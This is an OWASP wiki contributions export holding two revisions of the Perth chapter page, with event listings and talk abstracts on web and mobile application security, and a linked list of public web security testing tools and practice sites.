OWASP - User contributions [en]

Perth Australia

2015-04-07T11:21:11Z

Xntrik: updated for OWASP/AISA Collab April 2015

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:david.taylor@asteriskinfosec.com.au David Taylor]
* Chris Arnold
* Pedram H|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming Events ==

===Perth AISA/OWASP Collab!===

====Title====
Security in a Mobile App World
====Speaker====
Christian Frichot is a founder and principal at Asterisk Information Security and one of the Perth Chapter Leads for OWASP. He has been a contributor to a number of OWASP projects for over five years and has published tools, particularly related to the Software Assurance Maturity Model. Christian spends considerable time in the OWASP’s Development Testing and Code Review guides.

A presenter and author, Christian loves discussing security - especially its overlaps into application development.

====Abstract====
One of the largest shifts in product and application development over the past few years has been the explosion of mobile apps. Like many innovations in the IT space, security can often be late to the party, and this has been similar with the growth of mobile app development. While application security professionals are now starting to get a full grasp on applying security through the systems development lifecycle, the changes that come from the mobile space push the target a step away.

The Open Web Application Security Project (OWASP) is a not-for-profit organisation that aims to bring application security resources to the world for free. A number of OWASP projects can assist with development.

Interested in keeping abreast of the application of security within a mobile app’s development lifecycle? Keen to get an update on OWASP? In this month's joint AISA/OWASP presentation, Christian will discuss some of the older projects that still apply in a mobile app world, and some of the newer upcoming projects

==== Details ====
Date: Tuesday, 14th of April 2015

Time: 17:15

Location: The Ernst & Young Building, 11 Mounts Bay Road

RSVP: Email [mailto:christian.frichot@owasp.org christian.frichot@owasp.org]

== Previous OWASP Meetings ==

=== SecTalks 0x0 (November 2013) ===

munmap - doing his best to be a corporate guy - talking about Design Flaws: Pwning easy as one, two, three!

gman - another corporate guy - talking about Patch In The Middle: Subverting Client Upgrades

=== Training and Meeting by Jim Manico! - Securing the SDLC (May 2013) ===

OWASP board member and application security heavyweight Jim Manico is visiting Perth in May. Jim has kindly offered to run a free developer training session, and to present at an OWASP Perth chapter meeting.

=== Secure Coding and OOAD (March 2012) ===

Building on the OWASP secure coding priniciples, this session will introduce Robert C Martin's 5 OO principles in order to show how well designed code can help with the implementation and enforcement of secure coding principles, as well as alleviating maintenance headaches. Presented by Chris Arnold of Swiss power and ABB.

=== Defending Web Applications (December 2011) ===

Worried about having your site hacked? What about your Wordpress blog? David Taylor and Christian Frichot of OWASP Perth are back to talk about all things web security, and instead of spending a couple of hours trying to scare you with how to break stuff, we hope to educate you on how best to defend your web applications.

We’ll be covering a range of defensive methods, including addressing coding vulnerabilities directly, implementing an open source HIDS, or even implementing your own 2nd factor authentication scheme utilising the Google Authenticator.

Presented at Perth AISA's Techday 2011

=== How minor vulnerabilities can do ‘very bad things’ - The Sequel (May 2011) ===

Missed the 2010 AISA Techday session? Haven't made it out to an OWASP event lately? David and Christian are happy to be presenting their updated presentation, including live demos, on the impacts of web application security vulnerabilities at the upcoming Australia / New Zealand Testing Board (ANZTB) SIGIST meeting!

=== Cross-site scripting: You don’t always know who the actors are (May 2011) ===

So the time has come. Your company has finally approved the project to update your online web presence. A brand new, whiz-bang Content Management System is being deployed and your developers are frantically coding away to prepare a whole batch of fresh new content. Before you realise it, the delivery date is a week away and you have some security guy screaming at you about cross-site scripting issues!

Cross-site scripting? So what.

Does this experience sound familiar to you?

In this session Christian Frichot will spend some time dissecting this common web application vulnerability, and just how serious its impacts can be. Exploitation of cross-site scripting is no longer just within the realm of nerdy, hacker types, new (and old) tools out there allow this trivial vulnerability to be used for so much more, including keystroke logging, and even forcing your iPhone to dial a number via Skype. For those facing these issues there are plenty of resources which can help, and Christian will cover these as well.

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2013-11-13T10:43:50Z

Xntrik:

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:david.taylor@asteriskinfosec.com.au David Taylor]
* Chris Arnold
* Pedram H|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming Events ==

===SecTalks 0x00===

Interested in learning about some cool technical stuff in town?

====Speaker I====
munmap - doing his best to be a corporate guy
=====Title=====
Design Flaws: Pwning easy as one, two, three!
=====Abstract=====
This will be a talk around design and logic flaws vs. memory corruption bugs. Nowadays, people are more and more focused on design flaws as opposed to memory corruption bugs because of all of the defensive mechanisms in place such as DEP, ASLR, Stack and Heap Cookies, ASCII Armor, RELRO, etc. Logic and design flaw exploitation is usually a lot less time-consuming and way more reliable since attackers don't mess with all of the aforementioned mechanisms. I'll be demonstrating a real-world attack scenario against products such as [CENSORED], chaining multiple design and logic flaws in order to achieve full system compromise.

====Speaker II====
gman - another corporate guy
=====Title=====
Patch In The Middle: Subverting Client Upgrades
=====Abstract=====
Man in the middle proofs of concept often focus on stealing credentials, but a well implemented MITM on an untrusted network opens up a number of other interesting possibilities, particularly with regards to data tampering. You may have seen for example pranks with a MITM proxy where all website images are replaced with (lets say) lolcats, and perhaps using SSL and not trusting bogus certs or unknown SSH host fingerprints may mitigate this to an extent, but how about applications which aren't as paranoid as we are? Plenty of apps have auto update functionality, but how trusting are they with regards to the patches they download? In this session I take a look at the a client MITM attack framework 'Evilgrade' which is designed to subvert the auto-update function on a number of common apps, including Skype, Winamp, Virtualbox and others.

=== Details ===
Date: Thursday the 14th of November, 2013

Time: 18:00 (Aim for 5.30 - 5.45 arrival)

Location: Conference room, Level 4, 16 St Georges Tce

Beer Venue: Canton Bar, 532 Hay St, Perth

== Previous OWASP Meetings ==

=== Training and Meeting by Jim Manico! - Securing the SDLC (May 2013) ===

OWASP board member and application security heavyweight Jim Manico is visiting Perth in May. Jim has kindly offered to run a free developer training session, and to present at an OWASP Perth chapter meeting.

=== Secure Coding and OOAD (March 2012) ===

Building on the OWASP secure coding priniciples, this session will introduce Robert C Martin's 5 OO principles in order to show how well designed code can help with the implementation and enforcement of secure coding principles, as well as alleviating maintenance headaches. Presented by Chris Arnold of Swiss power and ABB.

=== Defending Web Applications (December 2011) ===

Worried about having your site hacked? What about your Wordpress blog? David Taylor and Christian Frichot of OWASP Perth are back to talk about all things web security, and instead of spending a couple of hours trying to scare you with how to break stuff, we hope to educate you on how best to defend your web applications.

We’ll be covering a range of defensive methods, including addressing coding vulnerabilities directly, implementing an open source HIDS, or even implementing your own 2nd factor authentication scheme utilising the Google Authenticator.

Presented at Perth AISA's Techday 2011

=== How minor vulnerabilities can do ‘very bad things’ - The Sequel (May 2011) ===

Missed the 2010 AISA Techday session? Haven't made it out to an OWASP event lately? David and Christian are happy to be presenting their updated presentation, including live demos, on the impacts of web application security vulnerabilities at the upcoming Australia / New Zealand Testing Board (ANZTB) SIGIST meeting!

=== Cross-site scripting: You don’t always know who the actors are (May 2011) ===

So the time has come. Your company has finally approved the project to update your online web presence. A brand new, whiz-bang Content Management System is being deployed and your developers are frantically coding away to prepare a whole batch of fresh new content. Before you realise it, the delivery date is a week away and you have some security guy screaming at you about cross-site scripting issues!

Cross-site scripting? So what.

Does this experience sound familiar to you?

In this session Christian Frichot will spend some time dissecting this common web application vulnerability, and just how serious its impacts can be. Exploitation of cross-site scripting is no longer just within the realm of nerdy, hacker types, new (and old) tools out there allow this trivial vulnerability to be used for so much more, including keystroke logging, and even forcing your iPhone to dial a number via Skype. For those facing these issues there are plenty of resources which can help, and Christian will cover these as well.

=== How minor vulnerabilities can do ‘very bad things’ (December 2010) ===

The Perth branch of the Australian Information Security Association is pleased to announce details for the second annual Perth AISA Tech day to be held on the 3rd December. This year we are holding the event in the heart of Perth’s CBD thanks to proud AISA supporters L7 Solutions.

Appearing for their second consecutive year, regular AISA and OWASP members Christian and David are following on from last year’s topic. Last year you will remember that the demonstrated a number of classes of vulnerabilities in web applications (XSS, CSRF, SQL Injection etc.). This year they are going to show how relatively minor vulnerabilities can be exploited and leveraged to do ‘very bad things’ ™ to the client browser, the web server or both.

This session will include demonstrations of the BeEF browser exploitation framework and Metasploit.

=== Web Application (In)Security Brief - Injection (September 2010) ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Phoenix/Tools

2013-01-09T12:22:39Z

Xntrik: Updated link to beef

Please send comments or questions to the [https://lists.owasp.org/mailman/listinfo/owasp-phoenix Phoenix-OWASP mailing-list].

=Testing grounds=
==LiveCDs==
OWASP Live CD - http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project 
Web Security Dojo - http://dojo.mavensecurity.com/ 
Samurai WTF - http://samurai.inguardians.com 
DVL (Damn Vulnerable Linux) - http://www.damnvulnerablelinux.org/ 
moth - http://www.bonsai-sec.com/en/research/moth.php 
OWASP Broken Web Applications - http://code.google.com/p/owaspbwa/ 
Hacking-Lab Live CD - https://www.hacking-lab.com/Remote_Sec_Lab/livecd.html 

==Test sites==
SPI Dynamics (live) - http://zero.webappsecurity.com/ 
Cenzic (live) - http://crackme.cenzic.com/ 
Watchfire (live) - http://demo.testfire.net/ 
Acunetix (live) - http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com 
WebMaven / Buggy Bank - http://www.mavensecurity.com/webmaven 
Foundstone SASS tools - http://www.foundstone.com/us/resources-free-tools.asp 
Updated HackmeBank - http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html 
OWASP WebGoat - http://www.owasp.org/index.php/OWASP_WebGoat_Project 
OWASP SiteGenerator - http://www.owasp.org/index.php/Owasp_SiteGenerator 
Stanford SecuriBench - http://suif.stanford.edu/~livshits/securibench/ 
SecuriBench Micro - http://suif.stanford.edu/~livshits/work/securibench-micro/ 
Google’s web application training - http://jarlsberg.appspot.com/part1/ 
OWASP TOP 10 LAB (Online) - https://www.hacking-lab.com/Remote_Sec_Lab/free-owasp-top10-lab.html 

=External Assessment=
==Browser==
===Add-ons for Firefox that help with general web application security===
Web Developer Toolbar - https://addons.mozilla.org/firefox/60/ 
Plain Old Webserver (POW) - https://addons.mozilla.org/firefox/3002/ 
XML Developer Toolbar - https://addons.mozilla.org/firefox/2897/ 
Public Fox - https://addons.mozilla.org/firefox/3911/ 
XForms Buddy - http://beaufour.dk/index.php?sec=misc&pagename=xforms 
MR Tech Local Install - http://www.mrtech.com/extensions/local_install/ 
Nightly Tester Tools - http://users.blueprintit.co.uk/~dave/web/firefox/buildid/index.html 
IE Tab - https://addons.mozilla.org/firefox/1419/ 
User-Agent Switcher - https://addons.mozilla.org/firefox/59/ 
ServerSwitcher - https://addons.mozilla.org/firefox/2409/ 
HeaderMonitor - https://addons.mozilla.org/firefox/575/ 
RefControl - https://addons.mozilla.org/firefox/953/ 
refspoof - https://addons.mozilla.org/firefox/667/ 
No-Referrer - https://addons.mozilla.org/firefox/1999/ 
LocationBar^2 - https://addons.mozilla.org/firefox/4014/ 
SpiderZilla - http://spiderzilla.mozdev.org/ 
Slogger - https://addons.mozilla.org/en-US/firefox/addon/143 
Fire Encrypter - https://addons.mozilla.org/firefox/3208/ 

===Browser-based HTTP tampering / editing / replaying===
TamperIE - http://www.bayden.com/Other/ 
isr-form - http://www.infobyte.com.ar/developments.html 
Modify Headers (Firefox Add-on) - http://modifyheaders.mozdev.org/ 
Tamper Data (Firefox Add-on) - http://tamperdata.mozdev.org/ 
UrlParams (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1290/ 
TestGen4Web (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1385/ 
DOM Inspector / Inspect This (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1806/ https://addons.mozilla.org/en-US/firefox/addon/1913/ 
LiveHTTPHeaders / Header Monitor (Firefox Add-on) - http://livehttpheaders.mozdev.org/ https://addons.mozilla.org/en-US/firefox/addon/575/ 

===Add-ons for Firefox that help with Javascript and Ajax web application security===
Selenium IDE - http://www.openqa.org/selenium-ide/ 
Firebug - http://www.joehewitt.com/software/firebug/ 
Venkman - http://www.mozilla.org/projects/venkman/ 
Chickenfoot - http://groups.csail.mit.edu/uid/chickenfoot/ 
Greasemonkey - http://www.greasespot.net/ 
Greasemonkey compiler - http://www.letitblog.com/greasemonkey-compiler/ 
User script compiler - http://arantius.com/misc/greasemonkey/script-compiler 
Extension Developer's Extension (Firefox Add-on) - http://ted.mielczarek.org/code/mozilla/extensiondev/ 
Smart Middle Click (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/3885/ 

===Bookmarklets that aid in web application security===
RSnake's security bookmarklets - http://ha.ckers.org/bookmarklets.html 
BMlets - http://optools.awardspace.com/bmlet.html 
Huge list of bookmarklets - http://www.squarefree.com/bookmarklets/ 
Blummy: consists of small widgets, called blummlets, which make use of Javascript to provide
rich functionality - http://www.blummy.com/ 
Bookmarklets every blogger should have - http://www.micropersuasion.com/2005/10/bookmarklets_ev.html 
Flat Bookmark Editing (Firefox Add-on) - http://n01se.net/chouser/proj/mozhack/ 
OpenBook and Update Bookmark (Firefox Add-ons) - http://www.chuonthis.com/extensions/ 

===Footprinting for web application security===
Evolution - http://www.paterva.com/evolution-e.html 
GooSweep - http://www.mcgrewsecurity.com/projects/goosweep/ 
Aura: Google API Utility Tools - http://www.sensepost.com/research/aura/ 
Edge-Security tools - http://www.edge-security.com/soft.php 
Fierce Domain Scanner - http://ha.ckers.org/fierce/ 
Googlegath - http://www.nothink.org/perl/googlegath/ 
Advanced Dork (Firefox Add-on) - https://addons.mozilla.org/firefox/2144/ 
Passive Cache (Firefox Add-on) - https://addons.mozilla.org/firefox/977/ 
CacheOut! (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1453/ 
BugMeNot Extension (Firefox Add-on) - http://roachfiend.com/archives/2005/02/07/bugmenot/ 
TrashMail.net Extension (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1813/ 
DiggiDig (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/2819/ 
Digger (Firefox Add-on) - https://addons.mozilla.org/en-US/firefox/addon/1467/ 

==Tools==
===SSL certificate checking / scanning===
SSL Labs - https://www.ssllabs.com/ssldb/ 
[ZIP] THCSSLCheck - http://thc.org/root/tools/THCSSLCheck.zip 
[ZIP] Foundstone SSLDigger - http://www.foundstone.com/us/resources/termsofuse.asp?file=ssldigger.zip 
Cert Viewer Plus (Firefox Add-on) - https://addons.mozilla.org/firefox/1964/ 
testssl.sh - http://drwetter.eu/software/ssl/ 
[[O-Saft]] - OWASP SSL audit for testers: list information about and test remote SSL certificate and connection [https://github.com/OWASP/O-Saft/archive/master.zip Download] 

===HTTP proxying / editing===
WebScarab - http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project 
Burp Suite - http://www.portswigger.net/ 
Paros - http://www.parosproxy.org/ 
Paros fork #1: Zed Attack Proxy (ZAP) - http://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project 
Paros fork #2: Andiparos - http://code.google.com/p/andiparos/ 
Fiddler - http://www.fiddlertool.com/ 
Web Proxy Editor - http://www.microsoft.com/mspress/companion/0-7356-2187-X/ 
Pantera - http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project 
Suru - http://www.sensepost.com/research/suru/ 
httpedit (curses-based) - http://www.neutralbit.com/en/rd/httpedit/ 
Charles - http://www.xk72.com/charles/ 
Odysseus - http://www.bindshell.net/tools/odysseus 
Burp, Paros, and WebScarab for Mac OS X - http://www.corsaire.com/downloads/ 
Web-application scanning tool from `Network Security Tools'/O'Reilly - http://examples.oreilly.com/networkst/ 
JS Commander - http://jscmd.rubyforge.org/ 
Ratproxy - http://code.google.com/p/ratproxy/ 
Arachni - https://github.com/Zapotek/arachni/ 
WATOBO - http://watobo.sourceforge.net/ 

==RSnake's XSS cheat sheet based-tools, webapp fuzzing, and encoding tools==
Wfuzz - http://www.edge-security.com/wfuzz.php 
ProxMon - http://www.isecpartners.com/proxmon.html 
Wapiti - http://wapiti.sourceforge.net/ 
Grabber - http://rgaucher.info/beta/grabber/ 
XSSScan - http://darkcode.ath.cx/scanners/XSSscan.py 
CAL9000 - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project 
EnDe - http://www.owasp.org/index.php/Category:OWASP_EnDe 
HTMangLe - http://www.fishnetsecurity.com/Tools/HTMangLe/publish.htm 
JBroFuzz - http://www.owasp.org/index.php/JBroFuzz 
J-Baah - http://www.sensepost.com/labs/tools/pentest/j-baah 
XSSFuzz - http://ha.ckers.org/blog/20060921/xssfuzz-released/ 
WhiteAcid's XSS Assistant - http://www.whiteacid.org/greasemonkey/ 
Overlong UTF - http://www.microsoft.com/mspress/companion/0-7356-2187-X/ 
[TGZ] MielieTool (SensePost Research) - http://packetstormsecurity.org/UNIX/utilities/mielietools-v1.0.tgz 
RegFuzzer: test your regular expression filter - http://rgaucher.info/b/index.php/post/2007/05/26/RegFuzzer%3A-Test-your-regular-expression-filter 
screamingCobra - http://www.dachb0den.com/projects/screamingcobra.html 
SPIKE and SPIKE Proxy - http://immunitysec.com/resources-freesoftware.shtml 
RFuzz - http://rfuzz.rubyforge.org/ 
WebFuzz - http://www.codebreakers-journal.com/index.php?option=com_content&task=view&id=112&Itemid=99999999 
TestMaker - http://www.pushtotest.com/Docs/downloads/features.html 
ASP Auditor - http://michaeldaw.org/projects/asp-auditor-v2/ 
WSTool - http://wstool.sourceforge.net/ 
Web Hack Control Center (WHCC) - http://ussysadmin.com/whcc/ 
Web Text Converter - http://www.microsoft.com/mspress/companion/0-7356-2187-X/ 
HackBar (Firefox Add-on) - https://addons.mozilla.org/firefox/3899/ 
Net-Force Tools (NF-Tools, Firefox Add-on) - http://www.net-force.nl/library/downloads/ 
PostIntercepter (Greasemonkey script) - http://userscripts.org/scripts/show/743 
fuzzdb - https://code.google.com/p/fuzzdb/ 

===HTTP general testing / fingerprinting===
Wbox: HTTP testing tool - http://hping.org/wbox/ 
ht://Check - http://htcheck.sourceforge.net/ 
WebInject - http://www.webinject.org/ 
Torture.pl Home Page - http://stein.cshl.org/~lstein/torture/ 
JoeDog's Seige - http://www.joedog.org/JoeDog/Siege/ 
OPEN-LABS: metoscan (http method testing) - http://www.open-labs.org/ 
Load-balancing detector - http://ge.mine.nu/lbd.html 
HMAP - http://ujeni.murkyroc.com/hmap/ 
Net-Square: httprint - http://net-square.com/httprint/ 
Wpoison: http stress testing - http://wpoison.sourceforge.net/ 
Net-square: MSNPawn - http://net-square.com/msnpawn/index.shtml 
hcraft: HTTP Vuln Request Crafter - http://druid.caughq.org/projects/hcraft/ 
rfp.labs: LibWhisker - http://www.wiretrip.net/rfp/lw.asp 
Nikto - http://www.cirt.net/code/nikto.shtml 
Websecurify - http://www.websecurify.com 
W3AF: Web Application Attack and Audit Framework - http://w3af.sourceforge.net/ 
twill - http://twill.idyll.org/ 
DirBuster - http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project 
[ZIP] DFF Scanner - http://security-net.biz/files/dff/DFF.zip 
[ZIP] The Elza project - http://packetstormsecurity.org/web/elza-1.4.7-beta.zip ([http://www.stoev.org/elza.html dead link]) 
HackerFox and Hacking Addons Bundled: Portable Firefox with web hacking addons bundled - http://sf.net/projects/hackfox 

===== dead, vanished links (March/2012) =====
Mumsie - http://www.secureworks.com/research/tools/mumsie/ ([http://www.lurhq.com/tools/mumsie.html dead link]) 
Torture.pl Home Page - source probably here http://www.foo.be/docs/tpj/issues/vol2_4/tpj0204-0002.html ([http://stein.cshl.org/~lstein/torture/ dead link]) 

===Cookie editing / poisoning===
[TGZ] stompy: session id tool - http://freecode.com/projects/stompy ([http://lcamtuf.coredump.cx/stompy.tgz old link]) 
Add'N Edit Cookies (AnEC, Firefox Add-on) - http://addneditcookies.mozdev.org/ 
CookieCuller (Firefox Add-on) - http://cookieculler.mozdev.org/ 
CookiePie (Firefox Add-on) - http://www.nektra.com/oss/firefox/extensions/cookiepie/ 
CookieSpy - http://www.codeproject.com/shell/cookiespy.asp 
